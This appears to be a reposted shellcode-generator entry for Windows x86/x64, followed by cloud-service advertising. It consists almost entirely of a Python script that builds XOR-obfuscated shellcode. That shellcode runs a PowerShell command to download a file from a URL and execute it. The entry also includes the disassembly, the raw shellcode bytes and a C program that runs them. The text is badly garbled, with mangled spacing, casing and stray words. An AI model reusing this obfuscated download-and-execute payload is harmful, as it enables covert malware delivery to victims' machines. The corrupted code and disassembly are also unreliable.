#Title: obfuscated Shellcode Windows x86/x64 Download and Execute [use PowerShell]-generator#length:dynamic! depend on URL and filename#date:20 January 2015#author:ali razmjoo#tested on:windows 7 x64 ultimate#winexec = 0x77 b1e695#exitprocess = 0x77ae2acf#==================================== #Execute: #powershell-command "& {( New-object net.webclient). DownloadFile (' Http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exe ', ' D:\Ali.exe ')};D: \ali.exe "#==== ================================ #Ali Razmjoo, [' [email protected] ', ' [email protected] '] #Thanks to my Friends, Dariush Nasirpour and Ehsan nezami#################################################### #How it work? " C:\users\ali\desktop>python "Windows x86 Download and execute.py" Enter urlexample:http://z3r0d4y.com/ File.exeenter:http://tartarus.org/~simon/putty-prerel-snapshots/x86/putty.exeenter filenameexample:d:\ File.exeenter:c:\ali.exec:\users\ali\desktop>nasm-f elf Shellcode.asm-o Shellcode.oc:\users\ali\desktop>objdump-d shellcode.oshellcode.o:file format elf32-i386disassembly of section. text:0 0000000 <.text>: 0:31 C0 xor%eax,%eax 2:50 push%eax 3:6 8 $0x22654141 push 8:58 pop%eax 9:c1 E8 shr $0x8,%eax c:c1 E8 shr $0x8,%eax f:50 push%eax 10:b8 0b 4 D mov $0x4d0b4734,%eax 15:BB 5d 6e/mov $0x356e695d,%ebx 1a:31 d8 x or%ebx,%eax 1c:50 push%eax 1d:b8-ten mov $0x22103243,%eax 22:b b 6e 4e mov $0x4e516e79,%ebx 27:31 D8 xor%ebx,%eax 29:50 Push%eax 2a:b8, MOV $0x32420560,%eax 2f:bb, the Mov $0x71797849,% EBX 34:31 D8 XOR%ebx,%eax 36:50 push%eax 37:B8 0f 1c 2c MOV $0x142c1c0f,% EAX 3C:BB 6a $0X3349646A,%EBX mov 41:31 D8 xor%ebx,%eax 43:50 Push%eax 44:b8 3e 0b mov $0x400b3e07,%eax 49:BB $6e mov $ 0X6E625246,%EBX 4e:31 D8 xor%ebx,%eax 50:50 push%eax 51:b8 0a $0X7780A44,%EAX mov 56:bb 5b mov $0x5b424963,%ebx 5b:31 d8 XOR%ebx,%eax 5d:50 push%eax 5e:b8 0f 4b 0d mov $0xd4b160f,%eax 63: BB 6a 2d mov $0x2d67316a,%ebx 68:31 D8 xor%ebx,%eax 6a:50 Push%eax 6b:b8 5c 1f mov $0x1f5c6218,%eax 70:BB, 4c, all in MOV $0x67394c6 1,%EBX 75:31 D8 XOR%ebx,%eax 77:50 push%eax 78:B8 1b 2d 1e 1f mov $0x1f1e2d1 B,%EAX 7D:BB 6b 6a 6b mov $0x6b6a586b,%ebx 82:31 D8 xor%ebx,%eax 84:50 Push%eax 85:B8 mov $0x66414045,%eax 8A:BB 3d $0X4977783D,%EBX 8f:31 D8 xor%ebx,%eax 91:50 push%eax 92:b8 02 1f 4b mov $0x454b1f02,%eax 97:BB 6d 6b 6a mov $0x6a386b6d,%ebx 9c:31 d8 XOR%ebx,%eax 9e:50 push%eax 9f:b8 3e mov $0x32193e24,%eax A4:BB 4e 6a 5a mov $0x5a6a4e45,%ebx a9:31 D8 xor%ebx,%eax ab:50 Push%EAX AC:B8 5e 3a/MOV $0x353a5e00,%eax B1:BB 6c $5b mov $0x5b 49736C,%EBX b6:31 D8 XOR%ebx,%eax b8:50 push%eax b9:b8 1f Notoginseng mov $0x24 40371f,%eax be:bb 6d $0X4132526D,%EBX mov c3:31 D8 xor%ebx,%eax c5: %eax c6:b8 2e $0x3168352e,%eax CB:BB 5a 4c 45 41 mov $0x41454c5a,%ebx d0:31 D8 xor%ebx,%eax d2:50 push%eax D3: B8 1e 1c, MOV $0x151c1e48,%eax D8:BB, 6e, $0X61696E67,%EBX mov dd:31 d8 XOR%ebx,%eax df:50 push%eax e0:b8 0d 5d mov $0x5d0d2826, %eax e5:bb 4f $0X3362454F,%EBX mov ea:31 D8 xor%ebx,%eax ec:50 Push%eax ed:b8 1d mov $0x451d5720,%eax F2:BB $0X36637847,%EBX F7:D8 xor%ebx,%eax f9:50 push%eax FA:B8 6a 3b MOV $0x3b246a04,%eax FF:BB 4b $0x494b4477,%ebx 104:31 D8 xor%ebx,%eax 10 6:50 push%eax 107:b8 0f 0a mov $0x320a0f18,%eax 10C:BB 6c 6e 78 47 mov $0x47786e6c,%ebx 111:31 D8 xor%ebx,%eax 113:50 push%eax 11 4:B8 7d 3c $0x273c187d,%eax mov 119:bb, 6c 5d, mov $0x555d6c52,%ebx 11e:31 d8 XOR%ebx,%eax 120:50 push%eax 121:b8, MOV $0x6060 4403,%EAX 126:BB 5a 4f mov $0x4f5a3477,%ebx 12b:31 D8 xor%ebx,%eax 12d:50 Push%eax 12E:B8 6b 1f mov $0x201f6b47,%eax 133:BB 6f 4c + mo V $0X54774C6F,%EBX 138:31 D8 xor%ebx,%eax 13a:50 push%eax 13B:B8 2a 5e 2b mo V $0x202b5e2a,%eax 140:bb 6c PNS mov $0x4547376c,%ebx 145:31 D8 xor%ebx,%e Ax 147:50 push%eax 148:b8 0e mov $0xe120759,%eax 14D:BB 6a mov $0x6a736835,%ebx 152:31 D8 xor%ebx,%eax 154:50 push%ea X 155:B8 2c mov $0x2c115901,%eax 15A:BB mov $0x42663645,%ebx 15f:31 D8 xor%ebx,%eax 161:50 push%eax 162:b8 4e 5a mov $0x 5a4e2222,%eax 167:BB 4c $0x7467564c,%ebx 16c:31 D8 xor%ebx,%eax 16e: %EAX 16f:b8 1b, MOV $0x481b3700,%eax 174:BB 5b 2d MOV $0x2d725b43,%ebX 179:31 D8 xor%ebx,%eax 17b:50 push%eax 17C:B8 4a 1f 22 13 mov $0x13221f4a,%eax 181:BB (mov) $0x71474864,%ebx 186:31 D8 xor%eb X,%eax 188:50 push%eax 189:B8 6a mov $0x1803236a,%eax 18E:BB 4a 6d 6 6 6c mov $0x6c666d4a,%ebx 193:31 D8 xor%ebx,%eax 195:50 push %eax 196:B8 2d 1c mov $0x1c57542d,%eax 19B:BB $0X68343147,%EBX 1a0: D8 xor%ebx,%eax 1a2:50 push%eax 1a3:b8 4e 5a mov $0x5a36154e,%eax 1a8:bb $0x38793839,%ebx 1ad:31 D8 xor%ebx,%eax 1AF:50 Push%eax 1b0:b8 7f 1f mov $0x41f7f59,%eax 1B5:BB 79 57 51 61 MOV $0x61515779,%ebx 1ba:31 D8 xor%ebx,%eax 1bc:50 push%eax 1bd:b8 1d 2f mov $0x2f1d5647,%eax 1c2:bb 3d $0X543D7065,%EBX mov 1c7:31 D8 xor %ebx,%eax 1c9:50 push%eax 1ca:b8 2c mov $0x5408182c,%eax 1CF:BB 4d 6c mov $0x746c764d,%ebx 1d4:31 d8 xor%ebx,%eax 1d6:50 p Ush%EAX 1D7:B8 5a 1b mov $0x1b58345a,%eax 1DC:BB 1 5b (mov $0x76355b39,%ebx) e1:31 D8 xor%ebx,%eax 1e3:50 push%eax 1e4:b8 3f 0f 4b m OV $0x414b0f3f,%eax 1E9:BB 6b 6c mov $0x6c6b6353,%ebx 1ee:31 D8 xor%ebx,% EAX 1f0:50 push%eax 1F1:B8 4a 1e 0b mov $0xb591e4a,%eax 1f6:bb (6d) 6e MOV $0x6e316D38,%EBX 1fb:31 D8 xor%ebx,%eax 1fd:50 push%eax 1FE:B8 2b 2a mov $0x2a162b49,%eax 203:bb-4f mov $0x4f614439,%ebx 208:31 d8 xo R%ebx,%eax 20a:50 push%eax 20b:89 E0 mov%esp,%eax 20D:BB 41 41 $0x1414141,%ebx mov 212:c1 eb $0x8,%ebx shr 215:c1 eb $0X8,%EBX 218:c1 eb, shr $0x8,%ebx 21b:53 push%ebx 21c:50 Push%eax 21D:BB e6 B1 The $0X77B1E695,%EBX 222:ff D3 call *%EBX 224:BB CF 2a AE $0X77AE2ACF,%EBX mov 229:ff d3 call *%ebxc:\users\ali\desktop> ; #you have your shellcode now=======================================shellcode.c#include <stdio.h> #include < String.h>int Main () {UnsigneD Char shellcode[]= "\x31\xc0\x50\x68\x41\x41\x65\x22\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb8\x34\x47\x0b\x4d\xbb\x5d \x69\x6e\x35\x31\xd8\x50\xb8\x43\x32\x10\x22\xbb\x79\x6e\x51\x4e\x31\xd8\x50\xb8\x60\x05\x42\x32\xbb\x49\x78\ X79\x71\x31\xd8\x50\xb8\x0f\x1c\x2c\x14\xbb\x6a\x64\x49\x33\x31\xd8\x50\xb8\x07\x3e\x0b\x40\xbb\x46\x52\x62\ X6e\x31\xd8\x50\xb8\x44\x0a\x78\x07\xbb\x63\x49\x42\x5b\x31\xd8\x50\xb8\x0f\x16\x4b\x0d\xbb\x6a\x31\x67\x2d\ X31\xd8\x50\xb8\x18\x62\x5c\x1f\xbb\x61\x4c\x39\x67\x31\xd8\x50\xb8\x1b\x2d\x1e\x1f\xbb\x6b\x58\x6a\x6b\x31\ Xd8\x50\xb8\x45\x40\x41\x66\xbb\x3d\x78\x77\x49\x31\xd8\x50\xb8\x02\x1f\x4b\x45\xbb\x6d\x6b\x38\x6a\x31\xd8\ X50\xb8\x24\x3e\x19\x32\xbb\x45\x4e\x6a\x5a\x31\xd8\x50\xb8\x00\x5e\x3a\x35\xbb\x6c\x73\x49\x5b\x31\xd8\x50\ Xb8\x1f\x37\x40\x24\xbb\x6d\x52\x32\x41\x31\xd8\x50\xb8\x2e\x35\x68\x31\xbb\x5a\x4c\x45\x41\x31\xd8\x50\xb8\ X48\x1e\x1c\x15\xbb\x67\x6e\x69\x61\x31\xd8\x50\xb8\x26\x28\x0d\x5d\xbb\x4f\x45\x62\x33\x31\xd8\x50\xb8\x20\ x57\x1d\x45\xbb\x47\x78\x63\x36\x31\xd8\x50\xb8\x04\x6a\x24\x3b\xbb\x77\x44\x4b\x49\x31\xd8\x50\xb8\x18\x0f\x0a\x32\xbb\x6c\x6e\x78\ x47\x31\xd8\x50\xb8\x7d\x18\x3c\x27\xbb\x52\x6c\x5d\x55\x31\xd8\x50\xb8\x03\x44\x60\x60\xbb\x77\x34\x5a\x4f\ X31\xd8\x50\xb8\x47\x6b\x1f\x20\xbb\x6f\x4c\x77\x54\x31\xd8\x50\xb8\x2a\x5e\x2b\x20\xbb\x6c\x37\x47\x45\x31\ Xd8\x50\xb8\x59\x07\x12\x0e\xbb\x35\x68\x73\x6a\x31\xd8\x50\xb8\x01\x59\x11\x2c\xbb\x45\x36\x66\x42\x31\xd8\ X50\xb8\x22\x22\x4e\x5a\xbb\x4c\x56\x67\x74\x31\xd8\x50\xb8\x00\x37\x1b\x48\xbb\x43\x5b\x72\x2d\x31\xd8\x50\ Xb8\x4a\x1f\x22\x13\xbb\x64\x48\x47\x71\x31\xd8\x50\xb8\x6a\x23\x03\x18\xbb\x4a\x6d\x66\x6c\x31\xd8\x50\xb8\ X2d\x54\x57\x1c\xbb\x47\x31\x34\x68\x31\xd8\x50\xb8\x4e\x15\x36\x5a\xbb\x39\x38\x79\x38\x31\xd8\x50\xb8\x59\ X7f\x1f\x04\xbb\x79\x57\x51\x61\x31\xd8\x50\xb8\x47\x56\x1d\x2f\xbb\x65\x70\x3d\x54\x31\xd8\x50\xb8\x2c\x18\ X08\x54\xbb\x4d\x76\x6c\x74\x31\xd8\x50\xb8\x5a\x34\x58\x1b\xbb\x39\x5b\x35\x76\x31\xd8\x50\xb8\x3f\x0f\x4b\ X41\xbb\x53\x63\x6b\x6c\x31\xd8\x50\xb8\x4a\x1e\x59\x0b\xbb\x38\x6d\x31\x6e\x31\xd8\x50\xb8\x49\x2b\x16\x2a\xbb\x39\x44\x61\x4f\x31\xd8\ X50\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\x95\xe6\xb1\x77\xff\xd3\xbb\ Xcf\x2a\xae\x77\xff\xd3 "; fprintf (stdout," Length:%d\n\n ", strlen (Shellcode)); (* (Void (*) ()) shellcode) ();} =======================================C:\USERS\ALI\DESKTOP>GCC Shellcode.c-o shellcode.exeC:\Users\Ali\ Desktop>shellcode.exelength:173c:\users\ali\desktop> #notice: When program exit, you must wait 2-3 second, it'll Finish download and execute file after 2-3 second ' import random,binasciichars = ' Abcdefghijklmnopqrstuvwxyzabcdefghijk lmnopqrstuvwxyz123456789=[]-' P1 = ' xor eax,eaxpush eax ' ' p2 = ' mov eax,espmov ebx,0x01414141shr ebx,0x08shr ebx,0x08 SHR ebx,0x08push ebxpush Eaxmov ebx,0x77b1e695call ebxmov ebx,0x77ae2acfcall ebx "' sen1 = str (raw_input (' Enter url\ Nexample:http://z3r0d4y.com/file.exe \nenter: ')) Sen1 = Sen1.rsplit () Sen1 = Sen1[0]sen2 = str (raw_input (' Enter filename\nexample:d:\\file.exe\nenter: ')) Sen2 = Sen2.rsplit () sen2 = Sen2[0]sen = ' PowerShell -command "& {(New-object net.webclient). DownloadFile ('%s ', '%s ')};%s ""% (sen1,sen2,sen2) m = 0for word in Sen:m + = 1m = M-1stack = ' while (m>=0): Stack + = Sen[m] M-= 1stack = Stack.encode (' hex ') skip = 1if len (stack)% 8 = = 0:skip = 0if Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 if Skip is 1:sta ck = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0 If Skip is 1: stack = ' xx ' + stack If len (stack)% 8 = = 0:skip = 0if len (stack)% 8 = = 0: Zxzxzxz = 0m = Len (stack)/8c = 0n = 0z = 8SHF = open (' Shellcode.asm ', ' W ') Shf.write (p1) shf.close () SHF = open (' Shellcod E.asm ', ' a ') while (c<m): v = ' push 0x ' + stack[n:z] Skip = 0 if ' 0x000000 ' in V: Skip = 1 q1 = v[13:] v = ' push 0x ' + q1 + ' 414141 ' + ' \ n ' + ' pop eax\nshr ea X,0x08\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x0000 ' in v:skip = 1 q1 = v[11: ] v = ' push 0x ' + q1 + ' 4141 ' + ' \ n ' + ' pop eax\nshr eax,0x08\nshr eax,0x08\npush eax\n ' if ' 0x00 ' I n V:skip = 1 q1 = v[9:] v = ' push 0x ' + q1 + ' + ' + ' \ n ' + ' pop eax\nshr eax , 0x08\npush eax\n ' If Skip is 1:shf.write (v) if skip is 0:v = V.rsplit () zzz = ' for W in V:if ' 0x ' in w:zzz = STR (w) S1 = Binascii.b2a_hex (". Join (Random.choice (chars) for I in range (4))) S1 = ' 0x%s '%% data = "%x"% (int (zzz, +) ^ int (s1, +)) v = ' mov Eax,0x%s\nmov ebx,%s\nxor eax,ebx\npus H eax\n '% (DATA,S1) Shf.write (v) n + = 8 z + 8 c + = 1shf.write (p2) shf.close ()
---restore content ends---
< reprint >win X86-64-download & Execute (Generator)
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
